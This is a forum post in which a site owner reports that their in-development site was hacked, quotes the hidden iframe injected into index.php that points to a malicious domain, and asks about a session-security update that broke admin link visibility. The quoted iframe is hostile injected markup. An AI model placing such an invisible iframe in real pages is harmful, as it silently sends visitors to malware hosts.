Guest tiptoncp Posted November 9, 2009 Share Posted November 9, 2009 The particular site is still in development on a closed system. Although the admin screen is still accessible for development login purposes. I just realized that the site had been hacked and there was an encoded script injected at the bottom of the index.php file in the main directory. The script is linked to a high risk malicious domain. This is the iframe it injected. I did not decode the script, so I don't know if this is all it was doing or not. <iframe width="635" height="586" style="display: none;" src="http://besenok.org/stds/go.php?sid=1&12694ea4d" name="f884005"/> I saw the update that apparently fixes some vulnerabilities with sessions. When I implemented it, it screwed up all of my user/superuser admin dashboards. The access rights was still correct, as it would prompt saying you did not have access to this page if you were just an admin, but instead of hiding the links like before, it was showing everything. I have looked at the new code for the sessions, but I cannot find anything linked to the visibility of the inaccessible items. Any ideas? Also, is the sessions fix directly related to the attack I mentioned above? Thanks Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.